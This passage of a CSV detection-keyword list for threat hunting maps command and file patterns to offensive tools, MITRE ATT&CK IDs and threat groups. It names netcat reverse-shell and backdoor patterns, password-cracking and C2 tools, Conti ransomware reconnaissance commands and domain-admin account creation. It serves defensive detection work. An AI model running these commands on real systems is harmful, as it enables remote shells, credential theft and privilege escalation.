The status of registered indicates that the name is registered either by broadcast or with a WINS server.","T1049 - T1018 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat","1","0","N/A","4","10","N/A","N/A","N/A","N/A" +"*nc * -e /bin/bash*","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*nc 127.0.0.1 4000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*nc -l -p * -e *.bat*","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -l -p * -e /bin/bash*","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -l -p * -e cmd.exe*","greyware_tool_keyword","nc","Netcat Backdoor 
on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -nlvp 4444*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*nc -u -lvp *","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*nc -v -n -z -w1 *-*","greyware_tool_keyword","nc","Port scanner with netcat","T1046","TA0007","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -vlp 4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc -vlp 4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be 
used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc -z -v * *","greyware_tool_keyword","nc","netcat common arguments","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nc.exe 127.0.0.1 4444*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nc.exe -l -p 1337*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*ncat * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*ncat * -p 4444*","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network 
Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*ncat --udp * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*nccgroup/demiguise*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*ncrack-*.dmg*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack-*-setup.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*NcrackInstaller.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack-master.zip*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ncrack-services*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - 
T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*ndDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ndp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*Ne0nd0g/merlin*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*needle_sift.x64*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a 
BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"*Needles without the Thread.pptx*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*needlesift.cna*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"*neo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*neo4j console*","greyware_tool_keyword","bloodhound","he neo4j console command is used to start the Neo4j server in console mode. 
While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","greyware tool - risks of False positive !","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*neo4j start*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*neo4jconnection.py*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*neoneggplant*","offensive_tool_keyword","Github Username","author of RAT tools on github","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nessus* --set listen_address=127.0.0.1*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.deb*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.dmg*","offensive_tool_keyword","nessus","Vulnerability 
scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.msi*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.rpm*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Nessus-*.txz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*nessus_vulns_cleaner.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*nessuscli fetch*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*nessuscli fix*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*nessus-updates*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*net domain_controllers*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net group ""Domain Admins"" /domain*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *domain admins* /domain*","offensive_tool_keyword","net","Conti Ransomware Proxyshell PowerShell command #9","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" +"*net group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - 
T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Domain Controllers*/domain*","greyware_tool_keyword","net","Query Domain Comtrollers Computers in the current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group *Enterprise Admins* /dom*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Microsoft 
Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net group / domain *Domain Admins*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net group /domain *Domain Admins*","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*net group administrators /domain*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*net localgroup admin*","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*net localgroup administrators icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*net rpc group addmem 'Domain admins' *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*net rpc group members 'Domain admins' -U *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*net rpc group members 'Domain Users' -W *","greyware_tool_keyword","samba","The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. It is used by attackers to find users list","T1087.002 - T1003.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*net start SysUpdate*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*net user /add icebreaker *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*net user HackMe *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z"
+"*net user john H4x00r123*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
